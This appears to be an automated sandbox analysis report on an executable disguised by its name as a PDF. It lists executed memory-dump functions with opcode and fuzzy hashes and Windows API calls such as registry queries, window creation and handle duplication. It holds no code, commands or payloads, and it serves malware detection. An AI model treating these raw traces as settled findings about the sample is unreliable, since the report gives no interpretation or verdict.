                                                      • Opcode ID: 249dfc8d529a614081061c7561594a50414b547b973abcccbd7ab9d2c12b89b5
                                                      • Instruction ID: 5aa8d1b269172d7c76a8153a845ea62f3ba9f6fbf8930b173338dbdaf6758b00
                                                      • Opcode Fuzzy Hash: 249dfc8d529a614081061c7561594a50414b547b973abcccbd7ab9d2c12b89b5
                                                      • Instruction Fuzzy Hash: BCF12532700A11CFCF2ADB38C49096D77A3AF86354B2A946AD406EB362CF75DC46C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: A4-058000200390-10-14_REV_pdf.exe PID: 1572 Parent PID: 7040 A4-058000200390-10-14_REV_pdf.exeCOMMON

                                                      Executed Functions

                                                      Function 063A8268, Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: U]-$|r.1$ly2
                                                      • API String ID: 0-242868099
                                                      • Opcode ID: 45b98c76cd57d8d99febf401e281fcd8e50fb4884107ae694e546fab4acf8447
                                                      • Instruction ID: 79b5c41b3bbc50999252de83733df697b0c1390c9e57d107625f128efe09fd4c
                                                      • Opcode Fuzzy Hash: 45b98c76cd57d8d99febf401e281fcd8e50fb4884107ae694e546fab4acf8447
                                                      • Instruction Fuzzy Hash: 85C1B034A11204CFDB88DFA8D5845ADBBBAEF89314F14852AD602EB364DB30DD02DBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D42743, Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 02D42B16
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: bd1813a535347e011a803fc8a37184aa9977712796f81502f64aa7db671d7c6a
                                                      • Instruction ID: c2f0b9e61dc99f37d60b9fcaad67b1d93192706e8c858832194090ba55ccb580
                                                      • Opcode Fuzzy Hash: bd1813a535347e011a803fc8a37184aa9977712796f81502f64aa7db671d7c6a
                                                      • Instruction Fuzzy Hash: 6AC18A70A006458FCB14EF79C494AAEBBF2FF89314B10896AD8499B755DB34EC45CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 067B8460, Relevance: 1.8, APIs: 1, Instructions: 287libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.920796406.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 96fa6c1d23c9ed6ab42b0294c125cf9f45727a72a5c16b96e7b37d1ebb05a377
                                                      • Instruction ID: 14285ec210bb3905b330ea128eef46a0fe26ad1a16c30651004286e56f5700d0
                                                      • Opcode Fuzzy Hash: 96fa6c1d23c9ed6ab42b0294c125cf9f45727a72a5c16b96e7b37d1ebb05a377
                                                      • Instruction Fuzzy Hash: 02B17A34B10209CFDB48DBA4D5547AEBBBBAF84308F209429D106AB394DB75DD45CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 067B90D0, Relevance: 1.7, APIs: 1, Instructions: 194libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.920796406.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7c477f5736cfa94afff463ef17faab6d388fa07ee937907912c60a655563681d
                                                      • Instruction ID: 136fb3d942c87baa8ff2d0acd8d39dfdabdc11d5c10d6c2ec9c8085aee6a43f6
                                                      • Opcode Fuzzy Hash: 7c477f5736cfa94afff463ef17faab6d388fa07ee937907912c60a655563681d
                                                      • Instruction Fuzzy Hash: AD71A071A102069FCB48EFB4D855AAEB7BABF85304F10952ED6169F390DB34DD05CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A0098, Relevance: .9, Instructions: 889COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: afd824307e558d0c1b30860dc935ca5a928777c19fb7a577effd267dc6e4591c
                                                      • Instruction ID: 51e998bfd55f31c1d0f594f85109a12370a4eb9e2bf1c47ec1e18869a9cef7fc
                                                      • Opcode Fuzzy Hash: afd824307e558d0c1b30860dc935ca5a928777c19fb7a577effd267dc6e4591c
                                                      • Instruction Fuzzy Hash: 71823730A10209DFCB58CF68C984AAEBBF6FF89318F158659E445EB361D730E945DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063ADAD0, Relevance: .3, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 602968bc184ad36cb9c0da282592a5fe4145b8ed929f87d06f3170473f121165
                                                      • Instruction ID: 630739790d58c5eae3af52a39efbb87dbbb5f5f46801a3a150b2a2f36b314d76
                                                      • Opcode Fuzzy Hash: 602968bc184ad36cb9c0da282592a5fe4145b8ed929f87d06f3170473f121165
                                                      • Instruction Fuzzy Hash: CAA18A31E002088BDB58DBB4D455AAEB7B7EF84304F508429D50AEFB54DF35AD46DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063ADAE0, Relevance: .3, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9817814a9c47cf31491fcfd9f5eb054171f473d02f8945836a9b090cd8dea70d
                                                      • Instruction ID: 61dd5dad2295344ccd8c04be198401445336e5e6bc77318f90963124c23fd9cf
                                                      • Opcode Fuzzy Hash: 9817814a9c47cf31491fcfd9f5eb054171f473d02f8945836a9b090cd8dea70d
                                                      • Instruction Fuzzy Hash: 04A19A31A002088FDB58DBB4D4519AEB7B7EF84308F50842AD50AEF795DF34AD06DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063ADAA8, Relevance: .3, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 89a77db14f5258b377f6f715463cf5b058eaaa6c4ab7d6488b88314f49f2c627
                                                      • Instruction ID: 41721be65dbd44f319d815a0fbf1856572555c2663f555ba57f1ba82fd0891c7
                                                      • Opcode Fuzzy Hash: 89a77db14f5258b377f6f715463cf5b058eaaa6c4ab7d6488b88314f49f2c627
                                                      • Instruction Fuzzy Hash: FB919A31A012048FCB58DBB4D4519AEB7B7EF84308F50842AD506EFB94DF35AD46DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AF4E8, Relevance: .2, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfaac616ac0f428c590ae81869086fa0d4372b2d7e80b8346e1a66556ee8bc8f
                                                      • Instruction ID: ea436f74146aa75a72a30b7e4b6b0495b76dee40540ade4f166614847a821b2f
                                                      • Opcode Fuzzy Hash: cfaac616ac0f428c590ae81869086fa0d4372b2d7e80b8346e1a66556ee8bc8f
                                                      • Instruction Fuzzy Hash: 6D711531F102058FDB88AB74E85196E77ABEBC8350F50842DDA16EB7A4DF309D059BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01370438, Relevance: 12.2, Instructions: 12206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.914536786.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a5c170a53cd4d3005adf31b53b813525ae96f19486a0b975284ed484913e127
                                                      • Instruction ID: 9e955a6105dbccb50b71e596a3f4f8cfb2eea1e164b9fbacaa9ecbd2962c4b29
                                                      • Opcode Fuzzy Hash: 4a5c170a53cd4d3005adf31b53b813525ae96f19486a0b975284ed484913e127
                                                      • Instruction Fuzzy Hash: D854DD78A0022D8FDB259B90C8506EAB7B2FF95304F10C0EAC60A67798DF355EA5DF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01370448, Relevance: 12.2, Instructions: 12200COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.914536786.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b70db6e6a9de469983cf3ac45e43f014cd3dba2bb1c7b6dbe2af857fdff675bf
                                                      • Instruction ID: e7fec48c9e9b6257f5bb7d7fd4b6d02071946665011d3ed66db850a37484526e
                                                      • Opcode Fuzzy Hash: b70db6e6a9de469983cf3ac45e43f014cd3dba2bb1c7b6dbe2af857fdff675bf
                                                      • Instruction Fuzzy Hash: 6A54DD78A0022D8FDB259B90C8506EAB7B2FF95304F10C0EAC60A67798DF355EA5DF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D45302, Relevance: 6.1, APIs: 4, Instructions: 145threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02D453A0
                                                      • GetCurrentThread.KERNEL32 ref: 02D453DD
                                                      • GetCurrentProcess.KERNEL32 ref: 02D4541A
                                                      • GetCurrentThreadId.KERNEL32 ref: 02D45473
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 7aacde6320830921091090392fea7276e511cbe8d769a64f9c108cb4e135f322
                                                      • Instruction ID: 0827f9a3d64d0f09338193096b8354856cb5c3f87a29e007315de4842dcad56c
                                                      • Opcode Fuzzy Hash: 7aacde6320830921091090392fea7276e511cbe8d769a64f9c108cb4e135f322
                                                      • Instruction Fuzzy Hash: E75158B49013848FDB14CFA9D548BDEBFF1AF49318F24809EE449A7761DB745848CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D45340, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02D453A0
                                                      • GetCurrentThread.KERNEL32 ref: 02D453DD
                                                      • GetCurrentProcess.KERNEL32 ref: 02D4541A
                                                      • GetCurrentThreadId.KERNEL32 ref: 02D45473
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 752ed9af475cec2fa7ba30be071da60b3fa283e90fe140825403c9dbca5d3cf1
                                                      • Instruction ID: e9e16f90f97b631e399b29c366f9340b00229f78481afa84f3726e590a9520da
                                                      • Opcode Fuzzy Hash: 752ed9af475cec2fa7ba30be071da60b3fa283e90fe140825403c9dbca5d3cf1
                                                      • Instruction Fuzzy Hash: 295133B4901249CFDB14CFA9D548BDEBBF1AB48318F20845EE459B7760CB746944CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D43A85, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D43BA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 6801f43c33548b3521837abc5c954d5366d048a40ada3bffd304f171a6212ae9
                                                      • Instruction ID: c04126b3ce36ae695f2f2eadf08d5c0e83829083ab1dc4f756ec2cf403db21bf
                                                      • Opcode Fuzzy Hash: 6801f43c33548b3521837abc5c954d5366d048a40ada3bffd304f171a6212ae9
                                                      • Instruction Fuzzy Hash: BE51B0B1D003499FDF14CFA9C884ADEBBB5BF48314F25826AE819AB210DB759945CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D43A90, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D43BA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: dd3e22cbd30c0f2b440cabc3e461749a1827fd9768c0bd05cb5bf835c6e50210
                                                      • Instruction ID: 534299cd24a99ca57e7db24b4e72d5adfa2a0d7a55fa6b5d5adca7d56b90a61d
                                                      • Opcode Fuzzy Hash: dd3e22cbd30c0f2b440cabc3e461749a1827fd9768c0bd05cb5bf835c6e50210
                                                      • Instruction Fuzzy Hash: DB41B0B1D003499FDF14CF99C884ADEBBB5BF48314F24826AE819AB310DB75A945CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D46180, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 02D46959
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: 840687dddd02b84355ce7608b84d6a73ea5afc886e688d7af48be926509826f5
                                                      • Instruction ID: 38efb8fa722a646e29e3520aeeca1de9b68f9e253bdd06808fe098dee658d3d7
                                                      • Opcode Fuzzy Hash: 840687dddd02b84355ce7608b84d6a73ea5afc886e688d7af48be926509826f5
                                                      • Instruction Fuzzy Hash: 034128B4A00345CFCB14CF99C488AAABBF9FB89314F248459E559AB721D774E845CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 067B06F3, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 067B0809
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.920796406.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                      Similarity
                                                      • API ID: QueryValue
                                                      • String ID:
                                                      • API String ID: 3660427363-0
                                                      • Opcode ID: 1fd1d36a08a51b57094927cdfc4b38d7b77a3558db333b75f4cb5df785210459
                                                      • Instruction ID: 098a9ca179e454ce1f665f59f759ea5105d1d4fa891a6683c6fe7540272851b7
                                                      • Opcode Fuzzy Hash: 1fd1d36a08a51b57094927cdfc4b38d7b77a3558db333b75f4cb5df785210459
                                                      • Instruction Fuzzy Hash: B23110B5D00258DFCB50CFA9C880BEEBBF5AF48314F14816AE819AB351D7749A05CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 067B0750, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 067B0809
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.920796406.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                      Similarity
                                                      • API ID: QueryValue
                                                      • String ID:
                                                      • API String ID: 3660427363-0
                                                      • Opcode ID: f8bcbc673c7cada15331e30e3f9b3894bed15413a6b82e74d8d0aa8f96965bad
                                                      • Instruction ID: 6a9d959be02fa5a981827551572ab5aa01657c36b40f5b18f10a5d4f72f5fc2c
                                                      • Opcode Fuzzy Hash: f8bcbc673c7cada15331e30e3f9b3894bed15413a6b82e74d8d0aa8f96965bad
                                                      • Instruction Fuzzy Hash: EF31B0B1D00258DFCB10CF9AC984ADEBBF5BF48714F15816AE819AB310D774A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 067B0518, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 067B05CC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.920796406.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 7f4b55e9b64c1f5affc524101b8afa581eb3c7014506e266e70e13d8857455da
                                                      • Instruction ID: e4fbb4b37f08130720278a63af603da220d0839804235189e57275fb35dcc693
                                                      • Opcode Fuzzy Hash: 7f4b55e9b64c1f5affc524101b8afa581eb3c7014506e266e70e13d8857455da
                                                      • Instruction Fuzzy Hash: 2A31FFB0D012499FDB10CF99C584BCEFBF5BF48314F28816AE809AB340D7759985CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D45563, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D455EF
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 68587a8e1bcbdb8c53e32b07fbeb3ff823bb458ef31f415dc839fda74a50d1eb
                                                      • Instruction ID: e1f026731a202e9ccab6eca12cfc663eb76d0645f2f49ebaee2505d651828243
                                                      • Opcode Fuzzy Hash: 68587a8e1bcbdb8c53e32b07fbeb3ff823bb458ef31f415dc839fda74a50d1eb
                                                      • Instruction Fuzzy Hash: 0D2105B5D002489FCB10CFA9D984ADEBBF5EB48324F14801AE954B7310D774A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D45568, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D455EF
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: ab193175c465763fdd7eee6306514fcaf61d18d89ce78d7e694c074f212b18a0
                                                      • Instruction ID: 14d76176ae932c544787999113f9c4a9fc01daabdeceec07a68135063c7b77d6
                                                      • Opcode Fuzzy Hash: ab193175c465763fdd7eee6306514fcaf61d18d89ce78d7e694c074f212b18a0
                                                      • Instruction Fuzzy Hash: A021D5B5D002489FDB10CF99D984ADEBBF9FB48324F14841AE914B7750D778A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D4A748, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02D4A7D2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID:
                                                      • API String ID: 2118026453-0
                                                      • Opcode ID: 54aece5156958cbbfb5d63d78915060e715329d6ad655b6005f6ad60a947ee4d
                                                      • Instruction ID: 41ebfc2542ebf28596664adf8147d4397d3f14307aa167d99cb5e2d9c890aabc
                                                      • Opcode Fuzzy Hash: 54aece5156958cbbfb5d63d78915060e715329d6ad655b6005f6ad60a947ee4d
                                                      • Instruction Fuzzy Hash: A72177719402858FDB20DFA9C95979ABBF8EB08318F108069D849E7740DB38A905CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D4A758, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02D4A7D2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID:
                                                      • API String ID: 2118026453-0
                                                      • Opcode ID: 11bca0b1d356b56e5c513000277c120fa61d399bb227a1d43a0ee36f5b56fb64
                                                      • Instruction ID: d9c43fad81ac79f24da9131245f0545353a1f5b4b5db899294b0bfcd37c680db
                                                      • Opcode Fuzzy Hash: 11bca0b1d356b56e5c513000277c120fa61d399bb227a1d43a0ee36f5b56fb64
                                                      • Instruction Fuzzy Hash: 131167709413898FDB20DFA9C54979ABFF8FB48314F108469D409E7700CB786905CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02D41CD8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 02D42B16
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.915471855.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 8f4d2e7b1d01ca7938b2bad66f7f49fbf46c4a5c2d3625cde62e48271d233b5f
                                                      • Instruction ID: eb69bd594a1aa1b8b8a2fdfe3dab9b9df8b702bed13b487845b173b494f54621
                                                      • Opcode Fuzzy Hash: 8f4d2e7b1d01ca7938b2bad66f7f49fbf46c4a5c2d3625cde62e48271d233b5f
                                                      • Instruction Fuzzy Hash: 061112B59002488BDB10CF9AC448BDEBBF4AB48324F10841AE859B7710C778A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063ABA08, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \Ak
                                                      • API String ID: 0-1678284976
                                                      • Opcode ID: e583e8cdd124e4172e7fce6554fa8d19eb9be13b8bd428a07024d8bab70ac786
                                                      • Instruction ID: 0d32c9ea96e705cfad473964c082a6a2b7524b76a8251405d8eb9becdb7c5fe9
                                                      • Opcode Fuzzy Hash: e583e8cdd124e4172e7fce6554fa8d19eb9be13b8bd428a07024d8bab70ac786
                                                      • Instruction Fuzzy Hash: E751D131F142088FDB44DB78D8903ADB6F7EB84350F148129E406AB784DF749C499BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AD978, Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GY+
                                                      • API String ID: 0-3999011982
                                                      • Opcode ID: 6d45db41f01cc937fd795583d2b3205631f0ff8526437ce4a29605cbc0f58071
                                                      • Instruction ID: 41c3b561d578f2c323e924ca7aab14a340ccc72e9b927c426a0fbacde8591047
                                                      • Opcode Fuzzy Hash: 6d45db41f01cc937fd795583d2b3205631f0ff8526437ce4a29605cbc0f58071
                                                      • Instruction Fuzzy Hash: 08314F34E1020A9FCB44DFA5E9544EDBBB2FF89344F10882DD215A7764EB34AA09CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AD988, Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GY+
                                                      • API String ID: 0-3999011982
                                                      • Opcode ID: ed8528409753b1e4666a265c93af3a9b023f2b8b88e873b25037e0543da93ed9
                                                      • Instruction ID: 23ac94a0bd060635c2a0925c1110da7c8bc0e0efcdafe23069e6d165f4ba093f
                                                      • Opcode Fuzzy Hash: ed8528409753b1e4666a265c93af3a9b023f2b8b88e873b25037e0543da93ed9
                                                      • Instruction Fuzzy Hash: 79213C74E1020ADFCB44DFA5E8458EDB7B6FF85340F10882DD216A7764EB346909CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A008B, Relevance: .3, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8654ab2a49a19a3f63072f0a185bd119e900d9217932764178439158d55d0cf
                                                      • Instruction ID: 6bcf1468fcd9dacffed283bf9d2dd412fb14001607169df8e819b6a04e0fe735
                                                      • Opcode Fuzzy Hash: f8654ab2a49a19a3f63072f0a185bd119e900d9217932764178439158d55d0cf
                                                      • Instruction Fuzzy Hash: 81C15830A002099FCB68CFA5C984AAEBBF6FF48318F158559E855EB661D730ED44DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AB630, Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: df5a72f97fe5b6f65988e770d2bf2f16c60e49dbb143891977bb3a84f5d5dbc4
                                                      • Instruction ID: c592204002c599e9830442558c8a5166a7bb57de3c94709ac9206ce0cbdfd724
                                                      • Opcode Fuzzy Hash: df5a72f97fe5b6f65988e770d2bf2f16c60e49dbb143891977bb3a84f5d5dbc4
                                                      • Instruction Fuzzy Hash: E9510D31F006248FD7909B78C844B6DB7A2EF89310F258178D91A9F7A1DB769C068BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AB9F9, Relevance: .1, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a9f07bb7fb51d64d52167c14b70907d8ed1751f790e321890736cc7fb3308c0
                                                      • Instruction ID: 3f2eb48a667eb5157b0bd02118b41dca2ce0469dcd8c6630796e8d84a79f8f3b
                                                      • Opcode Fuzzy Hash: 7a9f07bb7fb51d64d52167c14b70907d8ed1751f790e321890736cc7fb3308c0
                                                      • Instruction Fuzzy Hash: 4141D170F103088FDB54DB68D8947ADBBB7EB84300F148529E506AB380DF749C499BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A8748, Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16d1d2d27981c436ee966463445cb0015473d1795229fbbc1a91c4a72bbc8e62
                                                      • Instruction ID: 07b3cc7b52fec438c4fd9fb91dbbe985ddbf72d538f8414b36fd282ebc4807fd
                                                      • Opcode Fuzzy Hash: 16d1d2d27981c436ee966463445cb0015473d1795229fbbc1a91c4a72bbc8e62
                                                      • Instruction Fuzzy Hash: 8941F271B042068BCB449B78985157EBBBAEFC4258F10882AD106DB790DF34DD0597E1
